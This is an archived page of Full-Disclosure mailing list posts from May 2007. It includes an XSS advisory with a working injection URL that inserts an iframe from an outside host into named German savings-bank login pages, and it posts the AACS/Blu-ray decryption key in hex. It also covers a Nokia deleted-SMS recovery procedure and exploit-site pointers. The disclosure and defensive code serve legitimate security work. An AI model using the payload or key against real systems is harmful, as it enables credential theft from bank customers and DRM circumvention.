Re: [Full-disclosure] Windows POC

2007-05-16 Thread h4h

On 5/16/07, Larry Seltzer <[EMAIL PROTECTED]> wrote:


 >>I was wondering if anyone has a few Microsoft Windows Word proof of
concept exploits for a demo?
Go to http://www.milw0rm.com and search on Word

http://www.milw0rm.com/exploits/3260 for example

 Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blogs.eweek.com/cheap_hack/
Contributing Editor, PC Magazine
[EMAIL PROTECTED]



WHO IS YOUR DADDY AND WHAT DOES HE DO?
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] XSS vulnerability on various german online banking sites (sparkasse)

2007-05-16 Thread Ulrich Keil
The "Sparkassen-Finanzgruppe", with a transaction volume of over 3.300 
billion euro, is one of the largest banks for private customers in 
Germany. Many local member banks of the group use the online banking 
portal provided by sfze (http://www.sfze.de/), a subsidiary company of 
Sparkassen-Finanzgruppe.

Vulnerability:
The online banking software of sfze does not check the HTTP GET 
parameter "KONTO" on the login page, and displays the content of this 
variable without modification within the HTML form area.

Impact:
An attacker may gather login data (ID+PIN) from customers of the 
Sparkassen-Finanzgruppe by tricking them into clicking on a specially crafted 
link, which points to the original login page of the online banking system.

Demonstration:
The following trivial example demonstrates the impact of this 
vulnerability by extending the login form with an iframe:
https://bankingportal.sparkasse-donnersberg.de/banking/?BLZ=54051990&Bankingaufruf.x=0&Bankingaufruf.y=0&KONTO=%22%20/%3E%3Ciframe%20src=%22http://www.derkeiler.com/uk/sp.html%22%20scrolling=%22no%22%20marginheight=%220%22%20marginwidth=%220%22%20frameborder=%220%22width=%22310px%22

Some subsidiary companies of Sparkassen-Finanzgruppe which are affected 
by this vulnerability:
- Sparkasse Donnersberg
- Sparkasse Ludwigshafen
- Sparkasse KölnBonn
- Sparkasse Aachen
- Frankfurter Sparkasse
- Sparkasse Rhein Neckar Nord

Ulrich Keil
-- 
http://www.derkeiler.com
PGP Fingerprint: 5FA4 4C01 8D92 A906 E831  CAF1 3F51 8F47 1233 9AAD
Public key available at http://www.derkeiler.com/uk/pgp-key.asc
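
As an added illustration of the reflection described above (example code written for this page, not sfze's or the advisory author's): the KONTO value from the post's demonstration URL is decoded the way a server would decode it and placed into a hypothetical stand-in login form, once unmodified and once HTML-escaped for the attribute context; a count of opening tags shows that escaping keeps the form intact.

```python
import html
import re
from urllib.parse import parse_qs

# Query string from the advisory's demonstration URL (host and path omitted).
DEMO_QUERY = (
    "BLZ=54051990&Bankingaufruf.x=0&Bankingaufruf.y=0"
    "&KONTO=%22%20/%3E%3Ciframe%20src=%22http://www.derkeiler.com/uk/sp.html%22"
    "%20scrolling=%22no%22%20marginheight=%220%22%20marginwidth=%220%22"
    "%20frameborder=%220%22width=%22310px%22"
)

# Hypothetical stand-in for the login form; the real sfze markup is not on the page.
FORM_TEMPLATE = (
    '<form action="/banking/login" method="post">\n'
    '  <input type="text" name="KONTO" value="{konto}" />\n'
    '</form>'
)
TAG_RE = re.compile(r"<\s*([A-Za-z]+)")  # opening tags only; '</form' is skipped


def konto_from_query(query: str) -> str:
    """Decode the KONTO parameter as a server would (percent-decoding)."""
    return parse_qs(query).get("KONTO", [""])[0]


def render_vulnerable(konto: str) -> str:
    """The behaviour the advisory describes: the raw value lands inside the attribute."""
    return FORM_TEMPLATE.format(konto=konto)


def render_hardened(konto: str) -> str:
    """Fix: escape for attribute context, so '"', '<' and '>' cannot close the attribute."""
    return FORM_TEMPLATE.format(konto=html.escape(konto, quote=True))


def tag_names(page: str) -> list:
    """Opening tag names in document order; a quick check that the rendered
    form contains only the tags of the template."""
    return [m.group(1).lower() for m in TAG_RE.finditer(page)]


if __name__ == "__main__":
    konto = konto_from_query(DEMO_QUERY)
    print("vulnerable:", tag_names(render_vulnerable(konto)))  # ['form', 'input', 'iframe']
    print("hardened:  ", tag_names(render_hardened(konto)))    # ['form', 'input']
```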



Re: [Full-disclosure] A Story about my Childhood: Destination Whitehat

2007-05-16 Thread Open Phugu
On 5/16/07, Ross Brown <[EMAIL PROTECTED]> wrote:
> Aliso Viejo, CA - This is a story about my childhood, my sister and
removed load of crap
> With love, Ross Brown, 42 year resident of Aliso Viejo, California, ex-eEye 
> CEO.
>

Wow. Please, can someone explain to me what the hell this has to do
with computer security?



[Full-disclosure] Blu-Ray key - Oh Nine, Efe Nine

2007-05-16 Thread M . B . Jr .
well,
since no one has mentioned it yet...

here is the hex sequence 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88
C0, the already famous key for breaking HD-DVDs' Advanced Access Content
System and Blu-Ray as well, thanx to the Doom9 team.

no more workarounds...

what's the DMCA again...?


-- 
Marcio Barbado, Jr.


Re: [Full-disclosure] Windows POC

2007-05-16 Thread James Matthews

Yes that does suck!

On 5/16/07, str0ke <[EMAIL PROTECTED]> wrote:


On 5/16/07, Larry Seltzer <[EMAIL PROTECTED]> wrote:
>
>
>  >> http://www.milw0 ..  for example
>
> A word of advice to everyone: Don't send milw0rm links out to the list
> unless you want to drown in blowback from Antigen gateways.

Wow that sucks :)

/str0ke






--
http://www.goldwatches.com/watches.asp?Brand=39
http://www.wazoozle.com

[Full-disclosure] CA BrightStor ARCserve Backup Mediasvr.exe and caloggerd.exe Vulnerabilities

2007-05-16 Thread Williams, James K

Title: CA BrightStor ARCserve Backup Mediasvr.exe and 
caloggerd.exe Vulnerabilities

Notice Date: 2007-05-16

CA is aware that two functional exploit code samples were 
publicized on May 16, 2007. These two denial of service exploits 
are associated with vulnerabilities in CA BrightStor ARCserve 
Backup Mediasvr.exe and caloggerd.exe.

We have verified that vulnerabilities do exist, and we are now 
working on a patch to address the issues. We have given these 
vulnerabilities a Medium risk rating.

To mitigate the Mediasvr.exe vulnerability, CA recommends that 
BrightStor ARCserve Backup users implement the following temporary 
workaround:

   1. Rename the "mediasvr.exe" file to a non-functional file 
  name, such as "mediasvc.exe.disable".

   2. Then restart the CA BrightStor Tape Engine service.

This will disable the command line functionality in the product 
(i.e. command line utilities such as ca_backup, ca_restore, 
ca_merge, ca_qmgr, ca_scan, etc. will not work).

After we have completed our analysis of these issues, we will post 
an update and patches on the CA SupportConnect website. If 
additional information is required, please contact CA Technical 
Support at http://supportconnect.ca.com.

If you discover a vulnerability in CA products, please report your 
findings to vuln AT ca DOT com, or utilize our "Submit a 
Vulnerability" form at 
http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx


Regards,
Ken Williams ; 0xE2941985
Director, CA Vulnerability Research

CA, 1 CA Plaza, Islandia, NY 11749

Contact http://www.ca.com/us/contact/
Legal Notice http://www.ca.com/us/legal/
Privacy Policy http://www.ca.com/us/privacy/
Copyright (c) 2007 CA. All rights reserved.


Re: [Full-disclosure] Retrieving "deleted" sms/mms from Nokia phone (Symbian S60)

2007-05-16 Thread Davide Del Vecchio
3APA3A wrote:
> Dear Davide Del Vecchio,
> 
>  It's also possible to recover deleted photos from almost any flash card
>  in almost any device (camera, mobile, etc) - it's the way general purpose
>  file systems work. The requirement to delete information securely is
>  enforced in devices certified to e.g. process US military secrets. In
>  this case, the device must follow DoD 5220-22-M recommendations and you can
>  expect secure erase. In general purpose operating systems and devices,
>  to delete information securely (wipe it) some additional
>  actions/utilities are usually required.
> 
> --Tuesday, May 15, 2007, 9:09:19 PM, you wrote to 
> full-disclosure@lists.grok.org.uk:
> 
> DDV> Hello list,
> 
> DDV> During some research, I found an intersting "feature"
> DDV> on my Nokia mobile phone; I was able to retrieve any
> DDV> apparently deleted sms/mms.

I completely agree with you.
In fact, the news is how EASY it is to recover deleted sms/mms without
using any recovery tool (just using the PC Nokia Suite), and the aim of
my post was to increase the perception of the privacy risk on mobile
devices.

I hope that after this post, Nokia people will think about introducing
more security features. Those are in fact often reduced to just
a 4 digit number (the PIN).

I think the question is crucial and, I hope, finally clear.

d.

-- 
http://www.alighieri.org



Re: [Full-disclosure] Retrieving "deleted" sms/mms from Nokia phone (Symbian S60)

2007-05-16 Thread Michael Holstein
and what's more .. Flash memory not being infinitely over-writable, file 
systems used on those devices (JFFS2 for example) actually encourage 
leaving data behind by ensuring recently unlinked logical blocks aren't 
re-used anytime soon (wear-leveling).

I know the original method proposed is non-destructive, but using a test 
clip it's possible to dump the contents of just about any flash device. 
Furthermore, given a significantly motivated adversary (and barring all 
but physical destruction of the chip die itself -- not just the package) 
one could also read the contents with a microscope -- even after several 
erasures (*).

(*) link : http://www.cl.cam.ac.uk/~sps32/DataRem_CHES2005.pdf

But if all you're trying to do is retrieve SMS messages, it'd be a lot 
easier to just subpoena the carrier .. they keep the contents forever 
(even if they say they don't .. I know for a fact they do because I 
personally saw one of the major US carriers .. [ahem.. Verizon] .. 
deliver boxes of sent/received text messages -- for hundreds of phones 
-- going back at least a year).

Cheers,

Michael Holstein CISSP GCIA
Cleveland State University

>  It's also possible to recover deleted photos from almost any flash card
>  in almost any device (camera, mobile, etc) - it's the way general purpose
>  file systems work. The requirement to delete information securely is
>  enforced in devices certified to e.g. process US military secrets. In
>  this case, the device must follow DoD 5220-22-M recommendations and you can
>  expect secure erase. In general purpose operating systems and devices,
>  to delete information securely (wipe it) some additional
>  actions/utilities are usually required.



Re: [Full-disclosure] Retrieving "deleted" sms/mms from Nokia phone (Symbian S60)

2007-05-16 Thread 3APA3A
Dear Davide Del Vecchio,

 It's also possible to recover deleted photos from almost any flash card
 in almost any device (camera, mobile, etc) - it's the way general purpose
 file systems work. The requirement to delete information securely is
 enforced in devices certified to e.g. process US military secrets. In
 this case, the device must follow DoD 5220-22-M recommendations and you can
 expect secure erase. In general purpose operating systems and devices,
 to delete information securely (wipe it) some additional
 actions/utilities are usually required.

--Tuesday, May 15, 2007, 9:09:19 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

DDV> Hello list,

DDV> During some research, I found an interesting "feature"
DDV> on my Nokia mobile phone; I was able to retrieve any
DDV> apparently deleted sms/mms.


-- 
~/ZARAZA http://securityvulns.com/




[Full-disclosure] (no subject)

2007-05-16 Thread wafa louis
Hello. Please do not send me more messages. Please write Emily Write. I do not 
wish to join. Thank you.



Re: [Full-disclosure] Retrieving "deleted" sms/mms from Nokia phone (Symbian S60)

2007-05-16 Thread Robert McArdle

I downloaded the latest Version of Nokia PC Suite from the Nokia site (6.8.3Rel
14.1). I then sent a message to myself and deleted it after it arrived.
Backing up my phone created a single .ndu file (not multiple dats). I
analyzed the strings in the file (file uses no compression/packing) and
although I can see all my other Messages/Contacts - the test message was not
present.

The test was carried out on a Nokia N73 running Symbian 9.X

Robert McArdle
--
www.RobertMcArdle.com/blog/ - Techie/Security/Inane Ramblings

On 5/15/07, Davide Del Vecchio <[EMAIL PROTECTED]> wrote:


Hello list,

During some research, I found an interesting "feature"
on my Nokia mobile phone; I was able to retrieve any
apparently deleted sms/mms.
Leaving aside some paranoid thoughts about WHY these
sms are not deleted, I think that, while this represents
a high risk for our privacy, this discovery could give some
hints into the mobile phone forensics and anti-forensics field.

First, I would like to tell you that I tested this on
my Nokia N-gage and on a Nokia 6600 but I am quite sure
that this procedure works on every Nokia Symbian S60
(maybe other vendors). So I strongly incite you to test
it on your mobile phone and share the results.


Tested products:

Nokia N-gage, firmware version: V 4.03 26-11-2003 NEM-4

Nokia 6600

Maybe the whole S60 series.


Procedure:

Download the Nokia PC Suite for your mobile phone and make
a backup on your local hd.
I used PC Suite for Nokia N-Gage Version 1.0.0
http://www.nokia.com/pcsuite

It will create a huge number of ".dat" files in a specified
directory.

Download, install and start Cygwin. This is not required but
suggested; you could use a hexadecimal editor and a bit of
patience, but using Cygwin is surely faster.
http://www.cygwin.com


Move into the backup directory.


$ ls -al | less

total 6016
drwx--+ 2 Administrator Nessuno  0 Feb  6 01:35 .
drwx--+ 7 Administrator Nessuno  0 Feb  5 23:00 ..
-rwx--+ 1 Administrator Nessuno   2972 Nov 27  2003 1.dat
-rwx--+ 1 Administrator Nessuno  22913 Nov 27  2003 10.dat
-rwx--+ 1 Administrator Nessuno   1062 Feb 16  2005 100.dat
-rwx--+ 1 Administrator Nessuno   3912 Aug  9  2005 1000.dat
-rwx--+ 1 Administrator Nessuno   2750 Aug 25  2005 1001.dat
-rwx--+ 1 Administrator Nessuno   8741 Dec 15  2005 1002.dat
-rwx--+ 1 Administrator Nessuno   9926 Dec 20  2005 1003.dat
-rwx--+ 1 Administrator Nessuno 63 Dec 30  2005 1004.dat
-rwx--+ 1 Administrator Nessuno  23988 Jan 13  2006 1005.dat
-rwx--+ 1 Administrator Nessuno 18 Jan 23  2006 1006.dat
...
...
etc etc (files created by the nokia pc suite).


Choose a file to examine.

$ ls -al 3102.dat
-rwx--+ 1 Administrator Nessuno 666569 Feb  5 23:59 3102.dat

Use the command "strings" to find printable characters.

$ strings 3102.dat | less

Ciao! Auguro a te ed alla tua [EMAIL PROTECTED] Farlonesi
...
...
etc etc



This is part of an sms I deleted and that I don't see on my phone.
So, just grep every file in the directory to find the complete sms:

$ grep -i "Auguro a te ed alla" *

Binary file 1770.dat matches
Binary file 3102.dat matches

The sms has been found in 1770.dat file, let's see what's inside it:

$ strings 1770.dat

Ciao! Auguro a te ed alla tua famiglia un felice anno nuovo! E.
4+393915253350
4+393922378986

Got it! The complete sms, with the phone number of the sender (phone
numbers have been changed).
In earlier versions of Nokia PC Suite it just creates a ".nbu" file and
you can just edit it with a hexadecimal editor.

I mailed the Nokia support and they told me they didn't know about this
bug and would like to know more information about impacted models, but
they don't have any intention to release some kind of patch.
I contacted Symbian too; they told me that Symbian sources are
distributed to mobile phone vendors and so they cannot release any
final-user patch.

This description is also available here:
http://www.alighieri.org/advisories/retrieving_deleted_sms.txt (ENG)
http://www.alighieri.org/advisories/recuperare_sms_cancellati.txt (ITA)

Regards,

Davide Del Vecchio.

--
http://www.alighieri.org





--
www.RobertMcArdle.com/blog/ - Techie/Security/Inane Ramblings
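
An added example, not part of Davide's or Robert's posts, that performs the strings/grep steps of the quoted procedure in Python over a constructed stand-in backup directory (the .dat contents are made up for the example; the message text and numbers are the ones shown in the post): printable runs are extracted from each file and searched for the fragment, returning file names and byte offsets so residual message data can be located and reported.

```python
import os
import re
import tempfile


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """strings(1) equivalent: (offset, text) for each run of >= min_len printable ASCII bytes."""
    run_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [(m.start(), m.group().decode("ascii")) for m in run_re.finditer(data)]


def scan_backup(directory: str, pattern: str) -> dict:
    """grep -i equivalent over every .dat file in the backup directory.
    Returns {filename: [(offset, string), ...]} for strings containing the pattern."""
    needle = re.compile(pattern, re.IGNORECASE)
    hits = {}
    for name in sorted(os.listdir(directory)):
        if not name.endswith(".dat"):
            continue
        with open(os.path.join(directory, name), "rb") as fh:
            found = [(off, s) for off, s in extract_strings(fh.read()) if needle.search(s)]
        if found:
            hits[name] = found
    return hits


def build_sample_backup() -> str:
    """Constructed stand-in for a PC Suite backup directory (not real .dat content):
    binary filler around a message fragment, the full message and two numbers."""
    directory = tempfile.mkdtemp(prefix="nokia_backup_")
    files = {
        "1.dat": b"\x00" * 16 + b"Contact: Mario\x00\x05\x00",
        "1770.dat": (b"\x00\x01\xffMSG\x00"  # 7 bytes of header-like filler
                     b"Ciao! Auguro a te ed alla tua famiglia un felice anno nuovo! E."
                     b"\x00\x004+393915253350\x004+393922378986\x00\x01\x02"),
        "3102.dat": (b"\x7f\x00" * 8 + b"Ciao! Auguro a te ed alla tua "
                     b"\x00\x00\x03Farlonesi\x00"),
    }
    for name, content in files.items():
        with open(os.path.join(directory, name), "wb") as fh:
            fh.write(content)
    return directory


if __name__ == "__main__":
    backup = build_sample_backup()
    for name, found in scan_backup(backup, r"auguro a te ed alla").items():
        for offset, text in found:
            print(f"{name} @ {offset}: {text}")
```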

Re: [Full-disclosure] Month of [something] Bugs

2007-05-16 Thread Kristian Hermansen
On 5/16/07, "Guasconi Vincent" <[EMAIL PROTECTED]> wrote:
> I got an email from Mustlive about a new project he is starting up next month.
> In June, he's kicking off the Month of Search Engine Bugs.
> "
> http://websecurity.com.ua/category/moseb/

You really think people are going to expose their Gmail 0-days?
Heh...good luck :-)
-- 
Kristian Hermansen



Re: [Full-disclosure] Windows POC

2007-05-16 Thread str0ke
On 5/16/07, Larry Seltzer <[EMAIL PROTECTED]> wrote:
>
>
>  >> http://www.milw0 ..  for example
>
> A word of advice to everyone: Don't send milw0rm links out to the list
> unless you want to drown in blowback from Antigen gateways.

Wow that sucks :)

/str0ke



[Full-disclosure] About the Post: Exciting new Paimei release!

2007-05-16 Thread Jared DeMott
This message concerns the below post.  In case it isn't obvious, this
isn't the real Pedram.  We're not sure
who or why.

Blessings,
Jared

> I am excited to see Jared DeMott's recent post to Dailydave with his
> release of the Evolutionary Fuzzing System! A highly exciting and
> revolutionary (or is it EVOLUTIONARY!?) new fuzzing system designed for
> automatic discovery of protocols. A much exciting concept that I will
> have to write about in my new book!
> Also included in this release is code previously only private to my
> copy of Paimei! Previously, all remote debugging functionality was
> reserved for my private copy but apparently Jared DeMott felt the time
> was right to include pydbg_client class in his EFS release of Paimei!
> This should allow debuggers of applications to use the remote
> functionality of Paimei to debug processes running on remote computers.
> Also the all new pydbg_server, just in this release! These tools should
> help all of you most greatly. I highly recommend that instead of
> downloading the latest release of Paimei from openrce.org, you download
> the efs-paimei package from appliedsec.com, as their package has been
> updated far in advance of mine.
> Happy fuzzing, and let the best boundary character overflow!
> Pedram L. AminiAAA
> "But I return to my previous stack frame from there!"
> "NOT TONIGHT YOU DON'T"

Re: [Full-disclosure] Windows POC

2007-05-16 Thread Larry Seltzer
>> http://www.milw0 .. for example

A word of advice to everyone: Don't send milw0rm links out to the list
unless you want to drown in blowback from Antigen gateways.

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blogs.eweek.com/cheap_hack/
Contributing Editor, PC Magazine
[EMAIL PROTECTED]

Re: [Full-disclosure] Windows POC

2007-05-16 Thread Larry Seltzer
>>I was wondering if anyone has a few Microsoft Windows Word proof of
concept exploits for a demo?

Go to http://www.milw0rm.com and search on Word

http://www.milw0rm.com/exploits/3260 for example

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blogs.eweek.com/cheap_hack/
Contributing Editor, PC Magazine
[EMAIL PROTECTED]

[Full-disclosure] Windows POC

2007-05-16 Thread Stack Smasher

I was wondering if anyone has a few Microsoft Windows Word proof of concept
exploits for a demo?



Thank You

--
"If you see me laughing, you better have backups"